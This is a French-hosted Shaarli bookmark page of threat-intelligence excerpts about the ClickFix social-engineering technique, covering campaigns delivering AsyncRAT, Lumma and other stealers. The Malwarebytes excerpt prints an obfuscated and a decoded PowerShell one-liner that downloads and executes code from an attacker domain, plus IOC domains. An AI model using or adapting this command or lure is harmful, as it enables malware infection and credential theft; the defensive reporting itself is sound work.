Cyberveillecurated by Decio
Nuage de tags
Mur d'images
Quotidien
Flux RSS
  • Flux RSS
  • Daily Feed
  • Weekly Feed
  • Monthly Feed
Filtres

Liens par page

  • 20 links
  • 50 links
  • 100 links

Filtres

Untagged links
page 1 / 2
21 résultats taggé ClickFix  ✕
State-Sponsored Hackers Behind Majority of Vulnerability Exploits - Infosecurity Magazine https://www.infosecurity-magazine.com/news/state-hackers-majority/
31/08/2025 18:20:47
QRCode
archive.org
thumbnail

infosecurity-magazine James Coker
Deputy Editor, Infosecurity Magazine 29 Aug 2025

Recorded Future highlighted the vast capabilities of state actors to rapidly weaponize newly disclosed vulnerabilities for geopolitical purposes

The majority (53%) of attributed vulnerability exploits in the first half 2025 were conducted by state-sponsored actors for strategic, geopolitical purposes, according to a new report by Recorded Future’s Insikt Group.

The researchers said the findings demonstrate the growing ability of well-resourced state-sponsored groups to weaponize flaws rapidly following disclosure. Geopolitical purposes, such as espionage and surveillance, are the key motives for these threat actors.

“The significant state-sponsored involvement also implies that these threats are not just random or opportunistic but often targeted and persistent campaigns aiming at specific sectors or high-value systems,” they noted.

The majority of state-sponsored campaigns were conducted by Chinese state-sponsored actors. These groups primarily targeted edge infrastructure and enterprise solutions, a tactic that has continued since 2024.

Read now: Chinese Tech Firms Linked to Salt Typhoon Espionage Campaigns

The suspected China-linked group UNC5221 exploited the highest number of vulnerabilities in H1 2025. It demonstrated a preference for Ivanti products, including Endpoint Manager Mobile, Connect Secure and Policy Secure.

Financially motivated groups accounted for the remaining 47% of vulnerability exploits – 27% were made up of those actors involved in theft and fraud but not linked to ransomware and 20% attributed to ransomware and extortion groups.

The researchers predicted that the exploitation of edge security appliances, remote access tools and other gateway-layer software will remain a top priority for both state-sponsored and financially-motivated groups.

“The strategic value of these systems – acting as intermediaries for encrypted traffic and privileged access – makes them high-reward targets,” they noted.

Microsoft was the most targeted vendor, with the tech giant’s products accounting for 17% of exploitations.

Most Vulnerability Exploits Required No Authentication
Insikt Group’s H1 2025 Malware and Vulnerability Trends report, published on August 28, found that the total number of disclosed common vulnerabilities and exposures (CVEs) grew 16% year-over-year.

Attackers exploited 161 distinct vulnerabilities in the six-month period, up from 136 in H1 2024.

Of the 161 flaws, 69% required no authentication to exploit, while 48% could be exploited remotely over a network.

“This heavy tilt toward unauthenticated, remote exploits means that attacks can be launched directly from the internet against vulnerable hosts, with no credentials or insider access needed,” the researchers commented.

Additionally, 30% of the exploited CVEs enabled remote code execution (RCE), which often grants an attacker full control over the target system.

ClickFix Becomes a Favored Initial Access Technique
The report observed that ransomware actors adopted new initial access techniques in H1 2025.

This included a significant increase in ClickFix social engineering attacks. ClickFix involves the use of a fake error or verification message to manipulate victims into copying and pasting a malicious script and then running it.

The tactic preys on users’ desire to fix problems themselves rather than alerting their IT team or anyone else. Therefore, it is effective at bypassing security protections as the victim infects themselves.

The Interlock gang was observed using ClickFix in campaigns in January and February 2025.

The group has also leveraged FileFix in later attacks. This tactic is an evolution on ClickFix, where users are tricked into pasting a malicious file path into a Windows File Explorer’s address bar rather than using a dialog box.

Inskit group assess that the success of ClickFix means this method will remain a favored initial access technique through the rest of 2025 unless widespread mitigations reduce its effectiveness.

Post-compromise, ransomware groups have increased their use of endpoint detection and response (EDR) evasion via bring-your-own-installer (BYOI) techniques, and custom payloads using just-in-time (JIT) hooking and memory injection to bypass detection.

infosecurity-magazine.com EN 2025 State-Sponsored ClickFix Hackers vulnerability
Think before you Click(Fix): Analyzing the ClickFix social engineering technique | Microsoft Security Blog https://www.microsoft.com/en-us/security/blog/2025/08/21/think-before-you-clickfix-analyzing-the-clickfix-social-engineering-technique/
21/08/2025 21:40:58
QRCode
archive.org
thumbnail

Over the past year, Microsoft Threat Intelligence and Microsoft Defender Experts have observed the ClickFix social engineering technique growing in popularity, with campaigns targeting thousands of enterprise and end-user devices globally every day. Since early 2024, we’ve helped multiple customers across various industries address such campaigns attempting to deliver payloads like the prolific Lumma Stealer malware. These payloads affect Windows and macOS devices and typically lead to information theft and data exfiltration.

The ClickFix technique attempts to trick users into running malicious commands on their devices by taking advantage of their target’s tendency to solve minor technical issues and other seemingly benign interactions, such as human verification and CAPTCHA checks. It typically gives the users instructions that involve clicking prompts and copying, pasting, and running commands directly in the Windows Run dialog box, Windows Terminal, or Windows PowerShell. It’s often combined with delivery vectors such as phishing, malvertising, and drive-by compromises, most of which even impersonate legitimate brands and organizations to further reduce suspicion from their targets.

Because ClickFix relies on human intervention to launch the malicious commands, a campaign that uses this technique could get past conventional and automated security solutions. Organizations could thus reduce the impact of this technique by educating users in recognizing its lures and by implementing policies that will harden the device configurations in their environment (for example, disallowing users to use the Run dialog if it’s not necessary in their daily tasks). Microsoft Defender XDR also provides a comprehensive set of protection features that detect this threat at various stages of the attack chain.

This blog discusses the different elements that make up a ClickFix campaign—from the arrival vectors it comes with to its various implementations—and provides different examples of threat campaigns we’ve observed to further illustrate these elements. We also provide recommendations and detection details to surface and mitigate this threat.

microsoft.com EN 2025 Click(Fix) ClickFix analysis
A Wretch Client: From ClickFix deception to information stealer deployment — Elastic Security Labs https://www.elastic.co/security-labs/a-wretch-client
18/06/2025 08:23:30
QRCode
archive.org
thumbnail

Elastic Security Labs has observed the ClickFix technique gaining popularity for multi-stage campaigns that deliver various malware through social engineering tactics.

Our threat intelligence indicates a substantial surge in activity leveraging ClickFix (technique first observed) as a primary initial access vector. This social engineering technique tricks users into copying and pasting malicious PowerShell that results in malware execution. Our telemetry has tracked its use since last year, including instances leading to the deployment of new versions of the GHOSTPULSE loader. This led to campaigns targeting a broad audience using malware and infostealers, such as LUMMA and ARECHCLIENT2, a family first observed in 2019 but now experiencing a significant surge in popularity.

This post examines a recent ClickFix campaign, providing an in-depth analysis of its components, the techniques employed, and the malware it ultimately delivers.

Key takeaways

  • ClickFix: Remains a highly effective and prevalent initial access method.
  • GHOSTPULSE: Continues to be widely used as a multi-stage payload loader, featuring ongoing development with new modules and improved evasion techniques. Notably, its initial configuration is delivered within an encrypted file.
  • ARECHCLIENT2 (SECTOPRAT): Has seen a considerable increase in malicious activity throughout 2025.
elastic.co EN 2025 ClickFix analysis GHOSTPULSE ARECHCLIENT2 (SECTOPRAT)
HuluCaptcha — An example of a FakeCaptcha framework https://gi7w0rm.medium.com/hulucaptcha-an-example-of-a-fakecaptcha-framework-9f50eeeb2e6d
04/06/2025 13:20:20
QRCode
archive.org

Hello and welcome back to another blog post. After some time of absence due to a lot of changes in my personal life ( finished university, started a new job, etc), I am happy to finally be able to present something new.

Chapter 1: Captcha-verified Victim
This story starts with a message by one of my long time internet contacts:

Figure 1: Shit hit the Fan
I assume, some of you can already tell from this message alone that something terrible had just happend to him.

The legitimate website of the German Association for International Law had redirected him to an apparent Cloudflare Captcha site asking him to execute a Powershell command on device that does a Webrequest (iwr = Invoke-WebRequest) to a remote website (amoliera[.]com) and then pipes the response into “iex” which stands for Invoke-Expression.

Thats a text-book example for a so called FakeCaptcha attack.

For those of you that do not know what the FakeCaptcha attack technique is, let me give you a short primer:

A Captcha in itself is a legitimate method Website Owners use to differentiate between bots (automated traffic) and real human users. It often involves at-least clicking a button but can additionally require the website visitor to solve different form of small tasks like clicking certain images out of a collection of random images or identifying a bunch of obscurely written letters. The goal is to only let users visit the website that are able to solve these tasks, which are often designed to be hard for computers but easy for human beings. Well, most of the times.

gi7w0rm medium 2025 EN HuluCaptcha FakeCaptcha framework ClickFix
Victims risk AsyncRAT infection after being redirected to fake Booking.com sites https://www.malwarebytes.com/blog/news/2025/06/victims-risk-asyncrat-infection-after-being-redirected-to-fake-booking-sites
04/06/2025 13:14:33
QRCode
archive.org
thumbnail

We found that cybercriminals are preparing for the impending holiday season with a redirect campaign leading to AsyncRAT.
Cybercriminals have started a campaign of redirecting links placed on gaming sites and social media—and as sponsored ads—that lead to fake websites posing as Booking.com. According to Malwarebytes research, 40% of people book travel through a general online search, creating a lot of opportunities for scammers.

The first signs of the campaign showed up mid-May and the final redirect destination changes every two to three days.

Following the links brings visitors to a familiar strategy where fake CAPTCHA websites hijack your clipboard and try to trick visitors into infecting their own device.

fake Captcha
fake Captcha prompt
As usual on these websites, by putting a checkmark in the fake Captcha prompt you’re giving the website permission to copy something to your clipboard.

Afterwards, the scammers involved will try to have the visitor execute a Run command on their computer. This type of prompt is never used in legitimate Captcha forms and should be immediately suspicious to all individuals.

instructions for the visitor
instructions to infect your own device
If you’re using Chrome, you may see this warning:

Chrome warns but for what?
Chrome issues a warning but it may the danger may be unclear to users
The warning is nice, but it’s not very clear what this warning is for, in my opinion.

Users of Malwarebytes’ Browser Guard will see this warning:

Browser Guard clipboard warning
Malwarebytes Browser Guard’s clipboard warning
“Hey, did you just copy something?

Heads up, your clipboard was just accessed from this website. Be sure you trust the owner before passing this someplace you don’t want it. Like a terminal or an email to your boss.”

Well, either way, don’t just discard these warnings. Even if you think you’re looking at an actual booking website, this is not the kind of instructions you’re expected to follow.

What the website just put on the clipboard may look like gobbledegook to some, though more experienced users will see the danger.

pOwERsheLl –N"O"p"rO" /w h -C"Om"ManD "$b"a"np = 'b"kn"g"n"et.com';$r"k"v = I"n"v"o"k"e-"R"e"stMethod -Uri $ba"n"p;I"nv"oke"-"E"xp"r"es"sion $r"k"v"

The cybercriminals used mixed casing, quote interruption, and variable name manipulation to hide their true intentions, but what it actually says (and does if you follow the instructions) is:

powershell -NoProfile -WindowStyle Hidden -Command "$banp = 'bkngnet.com'; $rkv = Invoke-RestMethod -Uri $banp; Invoke-Expression $rkv"

The malicious Captcha form tells the user to copy the content of the clipboard into the Windows Run dialog box and execute the instructions from the above command. When Browser Guard detects that the text copied to the clipboard contains this kind of potentially malicious command, it will add the phrase Suspicious Content at the front of the copied content which makes it an invalid command and the user will see a warning instead of having infected themselves.

Should a user fall for this without any protections enabled, the command will open a hidden powershell window to download and execute a file called ckjg.exe which in turn would download and execute a file called Stub.exe which is detected by Malwarebytes/ThreatDown as Backdoor.AsyncRAT.

Backdoor.AsyncRAT is a backdoor Trojan which serves as a Remote Access Tool (RAT) designed to remotely monitor and control other computers. In other words, it puts your device at the mercy of the person controlling the RAT.

The criminals can gather sensitive and financial information from infected devices which can lead to financial damages and even identity theft.

IOCs
The domains and subdomains we found associated with this campaign rotate quickly. From what I could retrace, they change the URL to the landing page every two to three days. But here is a list of recently active ones.

(booking.)chargesguestescenter[.]com

(booking.)badgustrewivers.com[.]com

(booking.)property-paids[.]com

(booking.)rewiewqproperty[.]com

(booking.)extranet-listing[.]com

(booking.)guestsalerts[.]com

(booking.)gustescharge[.]com

kvhandelregis[.]com

patheer-moreinfo[.]com

guestalerthelp[.]com

rewiewwselect[.]com

hekpaharma[.]com

bkngnet[.]com

partnervrft[.]com

malwarebytes EN ClickFix AsyncRAT Booking.com
Hackers now testing ClickFix attacks against Linux targets https://www.bleepingcomputer.com/news/security/hackers-now-testing-clickfix-attacks-against-linux-targets/
12/05/2025 23:38:46
QRCode
archive.org
thumbnail

A new campaign employing ClickFix attacks has been spotted targeting both Windows and Linux systems using instructions that make infections on either operating system possible.
A new campaign employing ClickFix attacks has been spotted targeting both Windows and Linux systems using instructions that make infections on either operating system possible.

ClickFix is a social engineering tactic where fake verification systems or application errors are used to trick website visitors into running console commands that install malware.

These attacks have traditionally targeted Windows systems, prompting targets to execute PowerShell scripts from the Windows Run command, resulting in info-stealer malware infections and even ransomware.

However, a 2024 campaign using bogus Google Meet errors also targeted macOS users.

ClickFix targeting Linux users
A more recent campaign spotted by Hunt.io researchers last week is among the first to adapt this social engineering technique for Linux systems.

The attack, which is attributed to the Pakistan-linked threat group APT36 (aka "Transparent Tribe"), utilizes a website that impersonates India's Ministry of Defence with a link to an allegedly official press release.

bleepingcomputer EN 2025 APT36 ClickFix Linux Social-Engineering
Evil Deno: Abusing the Nicest JavaScript Runtime: Taggart Tech https://taggart-tech.com/evildeno/
06/05/2025 20:04:14
QRCode
archive.org
thumbnail

I've been following the development of Deno for some time. It kind of pushes all my buttons: a Rust-based Node alternative with an active web developer community?? Yes please.

As a developer, I've been looking for excuses to use Deno because, frankly, it's so much fun. It makes JavaScript/TypeScript enjoyable again by shipping sane defaults and making delightful choices about dependency management.

Deno also has some truly incredible features that go beyond the web development ecosystem. I want to focus on these features. I've wanted to explore Deno from an offensive security perspective for some time, but a new development in version 2.3 made this imperative: deno.exe—the standalone binary that constitutes the entire tool—is now code-signed on Windows.

Great news for Deno! But because of what Deno can do, it's also good news for those who would do nefarious things with it.

Code signing is a guarantee that the binary you got is the one you're supposed to have. It's supposed to be a higher level of trust than simply a hash checksum, since this is Microsoft telling you a trusted developer shipped this program.

It also means (for now), that Defender SmartScreen gives deno.exe a pass.

So what can Deno do for the red team and the ne'er-do-wells? I've put together a small sampling of demonstrations of Deno's capabilities.

I'm focusing somewhat on the "ClickFix" attack vector, since it is so prevalent at the time of writing, and apparently so effective. So with each of these, I want you to imagine some version of a user opening Win+R and pasting a short command in.

taggart-tech.com EN 2025 Evil Deno Evil-Deno Rust-based Node Defender SmartScreen ClickFix
Threat actors misuse Node.js to deliver malware and other malicious payloads | Microsoft Security Blog https://www.microsoft.com/en-us/security/blog/2025/04/15/threat-actors-misuse-node-js-to-deliver-malware-and-other-malicious-payloads/?_bhlid=7cad219df2b33b89940e503424edaf8ccb6df9b1
20/04/2025 12:38:06
QRCode
archive.org
thumbnail

Since October 2024, Microsoft Defender Experts has observed and helped multiple customers address campaigns leveraging Node.js to deliver malware and other payloads that ultimately lead to information theft and data exfiltration.

microsoft EN 2025 Node.js malware ClickFix exfiltration analysis campaign
From Contagious to ClickFake Interview: Lazarus leveraging the ClickFix tactic https://blog.sekoia.io/clickfake-interview-campaign-by-lazarus/
01/04/2025 11:54:41
QRCode
archive.org
thumbnail

Discover how Lazarus leverages fake job sites in the ClickFake Interview campaign targeting crypto firms using the ClickFix tactic.

sekoia EN 2025 ClickFake Interview ClickFix Lazarus
ClickFix: Another Deceptive Social Engineering Technique https://www.logpoint.com/en/blog/emerging-threats/clickfix-another-deceptive-social-engineering-technique/
31/03/2025 19:37:12
QRCode
archive.org
thumbnail

Discover ClickFix, a rising social engineering threat used to deliver malware and learn how to detect and respond against it with Logpoint.

logpoint EN 2025 ClickFix social-engineering Technique
Auto Dealership Supply Chain Attack https://rmceoin.github.io/malware-analysis/2025/03/13/supply-chain.html
24/03/2025 09:18:57
QRCode
archive.org

Over 100 auto dealerships were being abused compliments of a supply chain attack of a shared video service unique to dealerships. When active, the attack presented dealership visitors with a ClickFix webpage which led to a SectopRAT malware.

rmceoin EN 2025 Auto Dealership ClickFix SectopRAT analysis
Phishing campaign impersonates Booking .com, delivers a suite of credential-stealing malware https://www.microsoft.com/en-us/security/blog/2025/03/13/phishing-campaign-impersonates-booking-com-delivers-a-suite-of-credential-stealing-malware/
23/03/2025 10:56:48
QRCode
archive.org
thumbnail

Starting in December 2024, leading up to some of the busiest travel days, Microsoft Threat Intelligence identified a phishing campaign that impersonates online travel agency Booking.com and targets organizations in the hospitality industry. The campaign uses a social engineering technique called ClickFix to deliver multiple credential-stealing malware in order to conduct financial fraud and theft. […]

microsoft EN 2025 microsoft Phishing campaign credential-stealing malware Booking.com ClickFix
ClickFix: The Social Engineering Technique Hackers Use to Manipulate Victims https://www.group-ib.com/blog/clickfix-the-social-engineering-technique-hackers-use-to-manipulate-victims/
13/03/2025 16:15:08
QRCode
archive.org

Discover how the ClickFix social engineering attack exploits human psychology to bypass security. Learn how hackers use this tactic and how to protect against it.

group-ib EN 2025 ClickFix Social Engineering Manipulation analysis
Havoc: SharePoint with Microsoft Graph API turns into FUD C2 https://www.fortinet.com/blog/threat-research/havoc-sharepoint-with-microsoft-graph-api-turns-into-fud-c2
04/03/2025 08:29:11
QRCode
archive.org

ForitGuard Lab reveals a modified Havoc deployed by a ClickFix phishing campaign. The threat actor hides each stage behind SharePoint and also uses it as a C2.

FortiGuard-Labs-Threat-Research EN 2025 C2-server ClickFix SharePoint campaign
WordPress ClickFix Malware Causes Google Warnings and Infected Computers https://blog.sucuri.net/2025/02/wordpress-clickfix-malware-causes-google-warnings-and-infected-computers.html
23/02/2025 21:00:41
QRCode
archive.org
thumbnail

Learn about the fake Google reCAPTCHA campaign infecting machines by tricking unsuspecting users into running malicious Powershell commands.

sucuri EN 2025 WordPress ClickFix Malware reCAPTCHA
Malicious ads push Lumma infostealer via fake CAPTCHA pages https://www.bleepingcomputer.com/news/security/malicious-ads-push-lumma-infostealer-via-fake-captcha-pages/
22/12/2024 20:47:10
QRCode
archive.org
thumbnail

A large-scale malvertising campaign distributed the Lumma Stealer info-stealing malware through fake CAPTCHA verification pages that prompt users to run PowerShell commands to verify they are not a bot.

bleepingcomputer EN 2024 Captcha ClickFix Information-Stealer Lumma Malvertising Malware PowerShell Security InfoSec Computer-Security
“DeceptionAds” — Fake Captcha Driving Infostealer Infections and a Glimpse to the Dark Side of Internet Advertising https://labs.guard.io/deceptionads-fake-captcha-driving-infostealer-infections-and-a-glimpse-to-the-dark-side-of-0c516f4dc0b6
16/12/2024 21:14:16
QRCode
archive.org

Guardio Labs tracked and analyzed a large-scale fake captcha campaign distributing a disastrous Lumma info-stealer malware that circumvents general security measures like Safe Browsing. Entirely reliant on a single ad network for propagation, this campaign showcases the core mechanisms of malvertising — delivering over 1 million daily “ad impressions” and causing thousands of daily victims to lose their accounts and money through a network of 3,000+ content sites funneling traffic. Our research dissects this campaign and provides insights into the malvertising industry’s infrastructure, tactics, and key players.

Through a detailed analysis of redirect chains, obfuscated scripts, and Traffic Distribution Systems (TDS) — in collaboration with our friends at Infoblox — we traced the campaign’s origins to Monetag, a part of ProepllerAds’ network previously tracked by Infoblox under the name “Vane Viper.” Further investigation reveals how threat actors leveraged services like BeMob ad-tracking to cloak their malicious intent, showcasing the fragmented accountability in the ad ecosystem. This lack of oversight leaves internet users vulnerable and enables malvertising campaigns to flourish at scale.

labs.guard.io EN 2024 LummaStealer ClickFix DeceptionAds Advertising
Threat Actors Push ClickFix Fake Browser Updates Using Stolen Credentials https://www.godaddy.com/resources/news/threat-actors-push-clickfix-fake-browser-updates-using-stolen-credentials
12/12/2024 12:02:49
QRCode
archive.org
thumbnail

ClickFix fake browser updates are being distributed by bogus WordPress plugins. Learn about the common indicators of compromise.

godaddy EN 2024 ClickFix Fake Browser Updates WordPress
ClickFix tactic: Revenge of detection https://blog.sekoia.io/clickfix-tactic-revenge-of-detection/
05/11/2024 14:27:46
QRCode
archive.org
thumbnail

Detect the ClickFix tactic: a social engineering technique using fake video calls and CAPTCHA pages to deploy malicious code.

sekoia EN 2024 ClickFix tactic
ClickFix tactic: The Phantom Meet https://blog.sekoia.io/clickfix-tactic-the-phantom-meet/
30/10/2024 14:39:58
QRCode
archive.org
thumbnail

Analyse the ClickFix tactic and related campaigns. Uncover a ClickFix campaign impersonating Google Meet and cybercrime infrastructure.

sekoia EN 2024 ClickFix campaigns Google Meet
page 1 / 2
4835 links
Shaarli - Le gestionnaire de marque-pages personnel, minimaliste, et sans base de données par la communauté Shaarli - Theme by kalvn